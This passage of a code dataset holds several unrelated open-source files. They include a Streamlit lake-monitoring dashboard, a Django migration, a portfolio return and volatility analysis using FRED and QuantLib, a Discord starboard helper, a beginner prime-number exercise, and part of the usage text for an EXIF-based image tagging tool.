+{"seq_id":"33569479090","text":"import streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\nimport requests\nimport json\n\nimport time\nfrom PIL import Image\nimport prediction as pred\nimport reports as rep\n\nglobal data\ndef main():\n page = st.sidebar.selectbox(\"Navigate the app\", [\"Information\", \"Reports\", \"Predictions\"])\n if page == \"Information\":\n about()\n elif page == \"Reports\":\n st.write(\"# Lakes Water Quality Monitoring and Properties Data Report ⛵️\")\n rep.micro_view(data)\n rep.macro_view(data)\n elif page == \"Predictions\":\n pred.ml_model()\n st.sidebar.title(\" 🌸 About\")\n st.sidebar.info(\n \"\\nThis app is maintained by [Daniel](\"\n \"https://www.linkedin.com/in/daniel-lew-1a358bc/) & [Kapil] (http://kapil.rbind.io/).\\n\\n\"\n )\n\ndata_path = \"./Data/lake_data_for_viz.csv\"\n\n@st.cache\ndef load_data():\n data = pd.read_csv(data_path)\n return data\ndata = load_data()\n\ndef about():\n\n st.markdown(\"# Lakes Monitoring Dashboard\")\n st.markdown(\"\"\" This app displays a water quality monitoring and property report in the Twin Cities Metro Area alongside a machine learning model that produces predictions on the future median sale value of properties in the area.\n \"\"\")\n st.markdown(\"Every graph in this dashboard is interactive.\")\n image = Image.open('./media/lake.png')\n st.image(image, caption='',use_column_width=True)\n st.markdown(\"**🐳 Data Sources 🐳**\")\n st.markdown(\"This gives a general overview of the data sources \"\n \"used in this project.\")\n st.markdown(\"* Parcel data\")\n st.markdown(\"This dataset is a compilation of tax parcel polygon and point layers assembled into a common coordinate systems from Twin Cities, Minnesota metropolitan area counties.\")\n st.markdown(\"* Lake monitoring data\")\n st.markdown(\"This dataset contains lake quality in each lake and year.\")\n st.markdown(\"* MCES data\")\n st.markdown(\"[ The MCES Citizen-Assisted-Monitoring-Program(CAMP)](https://metrocouncil.org/Wastewater-Water/Services/Water-Quality-Management/Lake-Monitoring-Analysis/Citizen-Assisted-Monitoring-Program.aspx)\")\n #st.markdown(\"The MCES Citizen-Assisted Monitoring Program (CAMP) - \")\n st.markdown(\"The goal of the MCES lake monitoring program is to obtain and provide information that enables cities, counties, lake associations, and watershed management districts to better manage TCMA lakes, thereby protecting and improving lake water quality.\")\n st.markdown(\"**🌏 Project Roadmap 🌏**\")\n image2 = Image.open('./media/roadmap.png')\n st.image(image2, caption='',use_column_width=True)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dqniellew1/Lake-Monitoring-dashboard","sub_path":"Lake_monitoring_dashboard.py","file_name":"Lake_monitoring_dashboard.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1561104436","text":"from math import *\nfrom matrixFunctions import *\nimport numpy as np\n\nmatrix = np.array([[1, 1, 0, 0], [0, 1, 1, 0], [1, 2, 1, 0], [1, 4, -2, 0]])\n\nresult = np.array([2, 3, -1, 4]).transpose()\n\ntest1 = np.array([-3.3, 1.9, 11.5]).transpose()\ntest2 = np.array([6.1, -0.1, 6.5]).transpose()\ntest3 = np.array([4.1, 4.0, 5.5]).transpose()\ntest4 = np.array([3.5, 4.5, 4.5]).transpose()\n\nvector = np.linalg.solve(matrix, result)\n\nprint(vector)\n","repo_name":"SlygoPika/NumericalMethodsScripts","sub_path":"matrices.py","file_name":"matrices.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"42424652434","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Attributes',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=90, verbose_name='\\u0438\\u043c\\u044f')),\n ('value', models.CharField(max_length=90, null=True, verbose_name='\\u0437\\u043d\\u0430\\u0447\\u0435\\u043d\\u0438\\u0435', blank=True)),\n ],\n options={\n 'verbose_name': '\\u0430\\u0442\\u0442\\u0440\\u0438\\u0431\\u0443\\u0442',\n 'verbose_name_plural': '\\u0430\\u0442\\u0442\\u0440\\u0438\\u0431\\u0443\\u0442\\u044b',\n },\n ),\n migrations.CreateModel(\n name='Catalog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=90, verbose_name='\\u043d\\u0430\\u0437\\u0432\\u0430\\u043d\\u0438\\u0435 \\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433\\u0430')),\n ],\n options={\n 'verbose_name': '\\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433',\n 'verbose_name_plural': '\\u043a\\u0430\\u0442\\u0430\\u043b\\u043e\\u0433',\n },\n ),\n migrations.CreateModel(\n name='Goods',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=90, verbose_name='\\u043d\\u0430\\u0437\\u0432\\u0430\\u043d\\u0438\\u0435')),\n ('price', models.DecimalField(null=True, verbose_name='\\u0446\\u0435\\u043d\\u0430', max_digits=9, decimal_places=2, blank=True)),\n ],\n options={\n 'verbose_name': '\\u0442\\u043e\\u0432\\u0430\\u0440',\n 'verbose_name_plural': '\\u0442\\u043e\\u0432\\u0430\\u0440\\u044b',\n },\n ),\n migrations.AddField(\n model_name='attributes',\n name='goods',\n field=models.ForeignKey(verbose_name='\\u0442\\u043e\\u0432\\u0430\\u0440', blank=True, to='catalogApp.Goods', null=True),\n ),\n ]\n","repo_name":"mmasterenko/aqua","sub_path":"catalogApp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2572794701","text":"from typing import Dict\n\nfrom .base import BaseDatabase\nfrom .sqlite_wrapper import SQLiteDatabase\n\n\nclass AutoDatabase:\n \"\"\"\n Automatically select the appropriate database class based on the\n configuration.\n \"\"\"\n\n DATABASE_REGISTRY = {\n 'sqlite': SQLiteDatabase,\n }\n\n @classmethod\n def from_config(cls, db_cfg: Dict) -> 'BaseDatabase':\n \"\"\"\n Determine which database class to use based on the configuration\n and initialize it.\n\n Args:\n db_cfg (Dict): A dictionary containing database configuration\n parameters.\n\n Returns:\n BaseDatabase: An instance of the appropriate database class\n initialized with data from the configuration.\n \"\"\"\n db_type = db_cfg.get('type')\n\n database_class = cls.DATABASE_REGISTRY.get(db_type)\n\n if database_class is None:\n raise ValueError(f\"Unsupported database type '{db_type}'\")\n\n return database_class(db_cfg)\n","repo_name":"xinke-wang/project-tools","sub_path":"pjtools/database/auto_database.py","file_name":"auto_database.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7794004087","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPortfolio Construction:\nObjective: Calculate approximate forward return and scale accepted risk up or down accordingly.\nQuestions: What are expected returns for equity risk?\n What are expected fixed income returns?\n How much can they be expected to deviate?\n \n\n\ninputs: FRED data on spreads and total returns, MOVE Index, yield curve, VIX and returns\noutputs: Location of current spreads in historical range, forward return \n projections, spread change projections, volatility vs. volume/autocorrelation comparison\n -PCA Analysis\nToDo: -Improve length of data\n -Calculate return estimates for spreads and yields\n -Consider other estimates like worst drawdown etc.\n -Organize into subplots into a 1x4\n -How much can you speed up FRED estimator?\n -Where can you maximize sharpe in fixed income?\n -What is forward volatility estimate based on model?\n -Calculate highest sharpe fixed income\n -fix carry for multiple days between dates\n -Calculate implied vol premium/discount\n -Pull in schiller CAPE\n -Rolling vol analysis (rates, stocks, etc)\n -Correlate rates to price vol\n -Simon ward Switching models\n -Simon Ward Portfolio theory model\n -Real Rates / Breakevens\n -Position Sizing\n \nRationale: Shoot for a target Sharpe ratio of 2. Accept net long risk in proportion to estimated\n returns available. As estimated return increases (assets are cheap), increase \n volatility target to allow for 2.0 sharpe. \n \n \n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n#import quandl\nimport seaborn as sns\nimport pandas_datareader as pdr\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport yfinance as yf\nimport statsmodels.api as sm\nimport QuantLib as ql\n\n#function definitions\ndef risk_budget(account_value): \n return [vol_target*account_value, vol_target*account_value*np.sqrt(252)]\n\n#function definitions\ndef annual_return_equities():\n return annual_return\n\n\n#initializations\nsns.set()\n\n\n#Get current risk free rate\nrisk_free = pdr.get_data_fred(['USD3MTD156N'], dt.datetime(2020,1,1), dt.date.today())\nr = (risk_free.loc[:,'USD3MTD156N'].values)[-1]\ntarget_sharpe = 2\n\n\n#pull Investment Grade spreads, total return data from FRED \nstart = dt.datetime(1996, 1, 1)\nend = dt.date.today()\nIG_ICE_data = pdr.get_data_fred(['BAMLC0A0CM','BAMLC0A4CBBB','BAMLC8A0C15PY','BAMLC0A0CMEY'], start, end)\n\nfig = plt.figure(figsize=[8,8])\nplt.title(\"ICE BofA IG Spread Histogram, 1996-\")\nsns.distplot(IG_ICE_data.loc[:,'BAMLC0A0CM'], bins=50, label='IG', hist_kws={\"alpha\": .7})\nsns.distplot(IG_ICE_data.loc[:,'BAMLC0A4CBBB'], bins=50, label='BBB', hist_kws={\"alpha\": .1})\nsns.distplot(IG_ICE_data.loc[:,'BAMLC8A0C15PY'], bins=50, label='15Y+', color='purple', hist_kws={\"alpha\": .1})\n\nplt.xlabel('IG (blue), BBB (orange), 15yt+ (purple)')\nIG_ICE_quantile = IG_ICE_data.loc[:,'BAMLC0A0CM'].rank(pct=True)[-1]\nBBB_ICE_quantile = IG_ICE_data.loc[:,'BAMLC0A4CBBB'].rank(pct=True)[-1]\nLong_ICE_quantile = IG_ICE_data.loc[:,'BAMLC8A0C15PY'].rank(pct=True)[-1]\n\nprint(\"ICE/BofA IG spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC0A0CM'][-1]) + \"bp are higher than \" + '{:.1%}'.format(IG_ICE_quantile) + \" of history (1919-current)\")\nprint(\"ICE/BofA BBB spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC0A4CBBB'][-1]) + \"bp are higher than \" + '{:.1%}'.format(BBB_ICE_quantile) + \" of history (1919-current)\")\nprint(\"ICE/BofA 15yr+ spreads of \" + str(100*IG_ICE_data.loc[:,'BAMLC8A0C15PY'][-1]) + \"bp are higher than \" + '{:.1%}'.format(Long_ICE_quantile) + \" of history (1919-current)\")\n\n#print(\"1yr. forward yield change from this level is typically: \")\n\nstart = dt.datetime(1919, 1, 1)\nend = dt.date.today() \nIG_moodys_data = pdr.get_data_fred(['BAA','AAA'], start, end)\nIG_moodys_daily = pdr.get_data_fred(['DBAA','DAAA'], end + dt.timedelta(days=-7), end)\nIG_moodys_data.loc[IG_moodys_daily.index[-1],'BAA'] = IG_moodys_daily.loc[:,'DBAA'][-1]\nIG_moodys_data.loc[IG_moodys_daily.index[-1],'AAA'] = IG_moodys_daily.loc[:,'DAAA'][-1]\n\nfig = plt.figure(figsize=[8,8])\nplt.title(\"Moody's Baa/Aaa Yield Histogram, 1919-\")\nsns.distplot(IG_moodys_data.loc[:,'BAA'], bins=50, label='Baa')\nsns.distplot(IG_moodys_data.loc[:,'AAA'], bins=50, label='Aaa')\nplt.xlabel('Baa (blue), Aaa (orange)')\nBaa_quantile = IG_moodys_data.loc[:,'BAA'].rank(pct=True)[-1]\nAaa_quantile = IG_moodys_data.loc[:,'AAA'].rank(pct=True)[-1]\n\nprint(\"Moody's Baa yields of \" + '{:.1%}'.format(.01*IG_moodys_data.loc[:,'BAA'][-1]) + \" are higher than \" + '{:.1%}'.format(Baa_quantile) + \" of history (1919-current)\")\nprint(\"Moody's Aaa yields of \" + '{:.1%}'.format(.01*IG_moodys_data.loc[:,'AAA'][-1]) + \" are higher than \" + '{:.1%}'.format(Aaa_quantile) + \" of history (1919-current)\")\n#print(\"1yr. forward yield change from this level is typically: \")\n\n\n#Begin Equity Analysis\nFRED_equity_data = pdr.get_data_fred(['NCBEILQ027S','BCNSDODNS','CMDEBT','FGSDODNS','SLGSDODNS','FBCELLQ027S','DODFFSWCMI'], start, end)\nequity_allocation = ((FRED_equity_data.loc[:,'NCBEILQ027S']+FRED_equity_data.loc[:,'FBCELLQ027S'])/1000)/(((FRED_equity_data.loc[:,'NCBEILQ027S']+FRED_equity_data.loc[:,'FBCELLQ027S'])/1000)+FRED_equity_data.loc[:,'BCNSDODNS']+FRED_equity_data.loc[:,'CMDEBT']+FRED_equity_data.loc[:,'FGSDODNS']+FRED_equity_data.loc[:,'SLGSDODNS']+FRED_equity_data.loc[:,'DODFFSWCMI'])\nFRED_end_date = FRED_equity_data.index[-1] + dt.timedelta(days=90)\n\ntickerData = {}\ntickerDF = {}\nprediction_data = {}\nmodel_outputs = {}\nmodel_stats = {}\n\ntest_assets = ['^SP500TR','^GSPC','^IXIC'] #,'^XNDX','D1AR.DE']\nfor ticker in test_assets:\n tickerData[ticker] = yf.Ticker(ticker)\n #get the historical prices for this ticker\n tickerDF[ticker] = tickerData[ticker].history(period='1w', start='1971-1-1', end='2020-12-31')\n prediction_data[ticker] = pd.merge_asof(left=pd.DataFrame(equity_allocation, columns=['equity_allocation']), right=tickerDF[ticker], left_index=True, right_index=True).dropna()\n prediction_data[ticker].loc[:,'logDiff'] = np.log(prediction_data[ticker].loc[:,'Close']).diff()\n prediction_data[ticker].loc[:,'fwd1'] = prediction_data[ticker].loc[:,'logDiff'].rolling(4).sum().shift(-4)\n prediction_data[ticker].loc[:,'fwd3'] = prediction_data[ticker].loc[:,'logDiff'].rolling(12).sum().shift(-12)\n prediction_data[ticker].loc[:,'fwd5'] = prediction_data[ticker].loc[:,'logDiff'].rolling(20).sum().shift(-20)\n prediction_data[ticker].loc[:,'fwd10'] = prediction_data[ticker].loc[:,'logDiff'].rolling(40).sum().shift(-40)\n \n \n model_outputs[ticker] = {}\n model_stats[ticker] = {}\n\n #current_allocation = equity_allocation[-1]\n print('Implying current allocation from S&P 500 Total Returns')\n post_report = tickerDF['^SP500TR'].loc[tickerDF['^SP500TR'].index>FRED_end_date,'Close']\n post_report_return = post_report[-1]/post_report[0]\n last_report = FRED_equity_data.iloc[-1] \n current_allocation = ((last_report['NCBEILQ027S']*post_report_return+last_report['FBCELLQ027S']*post_report_return)/1000)/(((last_report['NCBEILQ027S']*post_report_return+last_report['FBCELLQ027S']*post_report_return)/1000)+last_report['BCNSDODNS']+last_report['CMDEBT']+last_report['FGSDODNS']+last_report['SLGSDODNS']+last_report['DODFFSWCMI'])\n\n \n allocation_quantile = prediction_data[ticker].loc[:,'equity_allocation'].append(pd.Series(current_allocation)).rank(pct=True).iloc[-1] \n print('\\n*Equity allocation is higher than ' + '{:.1%}'.format(allocation_quantile) + ' of available data points for ' + ticker + '.')\n \n\n print('\\nEquity Allocation vs. Forward Returns:')\n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd1']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd1']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 1yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_1yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('1yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n\n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd3']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd3']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 3yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_3yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('3yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n \n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd5']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd5']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 5yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_5yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('5yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n \n \n tmp_data = prediction_data[ticker].loc[:,['equity_allocation','fwd10']].dropna()\n X = sm.add_constant(tmp_data.loc[:,'equity_allocation'])\n Y = tmp_data.loc[:,'fwd10']\n model = sm.OLS(Y,X)\n results = model.fit()\n print(\"Equity Allocation of \" + '{:.1%}'.format(current_allocation) + \" implies a 10yr return of \" + '{:.1%}'.format(results.predict([1, current_allocation])[0]) + ' for ' + ticker)\n (model_stats[ticker])['equityAlloc_10yrFwd'] = results\n fig = plt.figure(figsize=(9,9), dpi=300)\n sns.regplot(x=X.iloc[:,1],y=Y)\n fig.suptitle('10yr. Forward Return [' + ticker + '] vs. Equity Allocation') \n \n \ntenYr_return = model_stats['^SP500TR']['equityAlloc_10yrFwd'].predict([1, current_allocation])[0]\nannual_return = np.log(1+tenYr_return)/10\nexcess_return_prediction = annual_return - r/100\nvol_target = excess_return_prediction / target_sharpe\n \nprint('\\n10yr forward return of S&P 500 annualizes to ' + '{:.1%}'.format(annual_return))\nprint('Risk free rate is ' + '{:.2%}'.format(r/100))\nprint('Excess return predictions is ' + '{:.2%}'.format(excess_return_prediction))\nprint('Annual vol target for ' + str(target_sharpe) + ' sharpe is: ' + '{:.2%}'.format(vol_target))\n\n\n#Begin Interest Rate Analysis\nbond_yields = pdr.get_data_fred(['DGS2','DGS3','DGS5','DGS7','DGS10','DGS20','DGS30'], dt.datetime(1962,1,1), dt.datetime(2020,2,1))\nmaturities = [(2,'DGS2'),(3,'DGS3'),(5,'DGS5'),(7,'DGS7'),(10,'DGS10'),(20,'DGS20'),(30,'DGS30')]\n\nduration = pd.DataFrame()\n# 1/bond_yields.loc[:,'DGS2'] * (1-1/(1+.5*bond_yields.loc[:,'DGS2'])**2*2)\n#ond_yields = bond_yields.dropna()\n#need to drop non-sequential days\n\ndayCount = ql.Thirty360()\ncalendar = ql.UnitedStates()\ninterpolation = ql.Linear()\ncompounding = ql.Compounded\ncompoundingFrequency = ql.Annual\n\ncurve_point = (2,'DGS2')\ntest_yields = bond_yields.loc[:,curve_point[1]].dropna()\nvalid_indices = np.where((np.diff((test_yields.index).values).astype('timedelta64[D]').astype(int))<7)[0]\nvalid_dates = test_yields.iloc[valid_indices]\n\n\nreturn_analysis = {}\nfor curve_point in maturities:\n test_yields = bond_yields.loc[:,curve_point[1]].dropna()\n valid_indices = np.where((np.diff((test_yields.index).values).astype('timedelta64[D]').astype(int))<7)[0]\n valid_dates = test_yields.iloc[valid_indices]\n \n return_analysis[curve_point] = pd.DataFrame()\n for idx, eval_date in enumerate(valid_dates.index):\n start = ql.Date(eval_date.day, eval_date.month, eval_date.year)\n maturity = start+365*curve_point[0]\n schedule = ql.MakeSchedule(start, maturity, ql.Period('6M'))\n interest = ql.FixedRateLeg(schedule, ql.Actual365Fixed(), [100.], [test_yields.loc[eval_date]/100])\n bond = ql.Bond(0, ql.UnitedStates(), start, interest)\n rate = ql.InterestRate(test_yields.loc[eval_date]/100, ql.Actual365Fixed(), ql.Simple, ql.Annual)\n open_price = ql.BondFunctions.cleanPrice(bond,rate,start)\n next_location = valid_indices[idx]+1\n rate_close = ql.InterestRate(test_yields.iloc[next_location]/100, ql.Actual365Fixed(), ql.Simple, ql.Annual)\n close_price = ql.BondFunctions.cleanPrice(bond,rate_close,start+1)\n price_return = close_price-open_price\n carry = (test_yields.loc[eval_date] / 365)\n total_return = price_return + carry\n return_analysis[curve_point].loc[eval_date,'open_yield'] = test_yields.loc[eval_date]/100\n return_analysis[curve_point].loc[eval_date,'close_yield'] = test_yields.iloc[next_location]/100\n return_analysis[curve_point].loc[eval_date,'open_price'] = open_price\n return_analysis[curve_point].loc[eval_date,'close_price'] = close_price\n return_analysis[curve_point].loc[eval_date,'price_return'] = price_return\n return_analysis[curve_point].loc[eval_date,'carry'] = carry\n return_analysis[curve_point].loc[eval_date,'total_return'] = total_return\n return_analysis[curve_point].loc[eval_date,'abs_move'] = abs(total_return)\n \n\n#graph analyses - 2y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(2,'DGS2')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(2,'DGS2')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(2,'DGS2')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 5y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(5,'DGS5')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(5,'DGS5')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(5,'DGS5')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 7y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(7,'DGS7')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(7,'DGS7')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(7,'DGS7')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 10y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(10,'DGS10')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(10,'DGS10')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(10,'DGS10')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 20y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(20,'DGS20')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(20,'DGS20')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(20,'DGS20')], x='open_yield', y='abs_move', fit_reg=True)\n\n#graph analyses - 30y\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.lineplot(data=return_analysis[(30,'DGS30')].loc[:,'total_return'])\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(30,'DGS30')], x='open_yield', y='total_return', fit_reg=True)\nfig = plt.figure(figsize=(9,9), dpi=300)\nsns.regplot(data=return_analysis[(30,'DGS30')], x='open_yield', y='abs_move', fit_reg=True)\n\n\n#calculate return & vol stats [not entirely comparable]\nreturn_2y = (1+return_analysis[(2,'DGS2')].loc[:,'total_return']/100).product()-1\nreturn_5y = (1+return_analysis[(5,'DGS5')].loc[:,'total_return']/100).product()-1\ndaily_vol_2y = (return_analysis[(2,'DGS2')].loc[:,'total_return']/100).std()\ndaily_vol_5y = (return_analysis[(5,'DGS5')].loc[:,'total_return']/100).std()\ndaily_vol_10y = (return_analysis[(10,'DGS10')].loc[:,'total_return']/100).std()\nmean_return_2y = (return_analysis[(2,'DGS2')].loc[:,'total_return']/100).mean()\n\ndaily_vol_2y*np.sqrt(252)\ndaily_vol_5y*np.sqrt(252)\ndaily_vol_10y*np.sqrt(252)\n\n\n# #diagnostics\n# ql.BondFunctions.startDate(bond)\n# ql.BondFunctions.maturityDate(bond)\n# test_yields[eval_date]/100\n# ql.BondFunctions.nextCashFlowDate(bond, start)\n# ql.BondFunctions.nextCashFlowAmount(bond, start)\n\n","repo_name":"jmfreeland/volAnalysis","sub_path":"portfolioDesign.py","file_name":"portfolioDesign.py","file_ext":"py","file_size_in_byte":16882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"28867415487","text":"import discord\n\nfrom redbot.core import Config\nfrom redbot.core.bot import Red\n\n__all__ = (\"get_starboard\", \"get_starboard_cache\", \"StarboardBase\")\n\n_guild_cache = {}\nbot: Red = None\nconfig: Config = None\n\n\ndef get_starboard(guild: discord.Guild):\n from starboard.guild import StarboardGuild\n\n if guild.id not in _guild_cache:\n sb = StarboardGuild(guild)\n _guild_cache[guild.id] = sb\n return _guild_cache[guild.id]\n\n\ndef get_starboard_cache():\n return _guild_cache\n\n\nclass StarboardBase:\n\n @property\n def config(self):\n return config\n\n @config.setter\n def config(self, cfg: Config):\n global config\n config = cfg\n\n @property\n def bot(self):\n return bot\n\n @bot.setter\n def bot(self, red: Red):\n global bot\n bot = red\n","repo_name":"celestialfault/Swift-Cogs","sub_path":"starboard/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"12081845079","text":"\ndef nguyento(n):\n for i in range(2, n):\n if n % i == 0:\n print(\"Khong phai so nguyen toc\",n)\n break\n else:\n print(\"so nguyen to la \",n)\n\n\n\n\nn_list = 1 , 2 ,4 ,8, 5\n\nresult_string =\"\"\nfor num in n_list:\n num = int(num)\n nguyento_num = nguyento(num)\n result_string += str(nguyento_num) + \"\\n\"\n\nprint(result_string)\n","repo_name":"aerovfx/Fullstack4kid","sub_path":"CREATE_APP/Python/PythonChallenge/Level1/b13_kiemtrasonguyentov1.py","file_name":"b13_kiemtrasonguyentov1.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"1510056489","text":"# -*- coding: utf-8 -*-\nfrom enum import Enum\nfrom typing import List\n\nfrom lib.query import MatchType\n\nUSAGE_STRING = \"\"\"Usage: tie.py action [tags] [options]\n\nTie is an acronym for \"tags in exif-data\". \nIt \"ties\" tags to image files using exif data fields while also maintaining a symlink-based index of tagged files for \nquerying purposes.\n\n\nACTIONS:\n help: print this help\n query: query for files with specified tags\n list: list all tags present on the specified files\n tag: add specified tag to specified file(s)\n untag: remove specified tag from specified file(s)\n clear: clear all tags from specified file(s)\n index: update the index for the specied file(s)\n\nAll actions may be called with their full name or just their initial character.\nIn other words, the following two commands are equivalent:\n\n tie.py help\n tie.py h\n\n\nOPTIONS:\n -f, --files file_1 [file_2 ... ]\n Specifies the files to apply the chosen action to.\n If this option is omitted and the specified action requires a specification of target files, the last \n argument will be treated as a file argument. \n In this case no other options may follow the file specification.\n\n -F, --frontend batch|yes|cli|gtk\n Chooses the frontend. The default is cli. Possible choices:\n batch: Non-interactive mode suitable for scripts. The answer to yes/no questions is aways \"no\".\n yes: Behaves as the batch frontend but always answers yes/no questions with \"yes\".\n cli: Interactive command line interface.\n gtk: Graphical user interface. Requires a running X session and gtk.\n \n -m, --match-type all|any\n Only applicable for the query action. Specifies whether to query for files that contain all or any of the\n specified tags, respectively.\n\n\nDepending on the chosen action, tags must be specified. All non-option-arguments that are provided after the action \nargument and before the files specification are interpreted as tags.\n\n\nCONFIGURATION:\nThe default configuration file path is $HOME/.tie.ini\nThis location can be overridden by setting the environment variable TIE_CONFIG_PATH to the desired path.\nThe syntax follows the .ini file format. See more detailed description and example below.\n\nThe following settings can be configured:\n \n exif_field:\n The exif field that is used to store and retrieve tag data. Defaults to \"Exif.Photo.UserComment\"\n \n index_path:\n The path to the directory where the symlink-based index is stored. Defaults to $HOME/.tie/\n\n\nEXAMPLES:\n Querying:\n tie query tag\n \n Querying for tags with white spaces:\n tie query 'tag 1' 'tag 2'\n\n Querying with short form for action:\n tie q tag\n \n Interactive querying in default (cli) frontend:\n tie query\n\n Interactive querying in gtk frontend:\n tie query --frontend gtk\n \n Listing tags\n tie list -f /path/to/file1 [/path/to/file2..]\n \n Tagging one file\n tie tag tag1 tag2 /path/to/file1\n \n Tagging multiple files with the same tags\n tie tag tag1 tag2 --files /path/to/file1 [/path/to/file2..]\n \n Untagging\n tie untag tag1 tag2 --files /path/to/file1 [/path/to/file2..]\n \n Clearing all tags\n tie clear --files /path/to/file1 [/path/to/file2..]\n \n Updating the index\n tie index --files /path/to/file1 [/path/to/file2..]\n \n Example configuration file with current default values:\n [GENERAL]\n index_path = /home/foo/.tie/\n [EXIV2]\n exif_field = Exif.Photo.UserComment\n charset = UTF-8\n quiet = yes\n keep_time_stamps = yes\n\"\"\"\n\n\nclass ParsingStage(Enum):\n action = 1\n tags = 2\n files = 3\n\n\nclass Action(Enum):\n help = 1\n query = 2\n list = 3\n tag = 4\n untag = 5\n clear = 6\n index = 7\n\n\n_short_actions = {\n 'h': Action.help,\n 'q': Action.query,\n 'l': Action.list,\n 't': Action.tag,\n 'u': Action.untag,\n 'c': Action.clear,\n 'i': 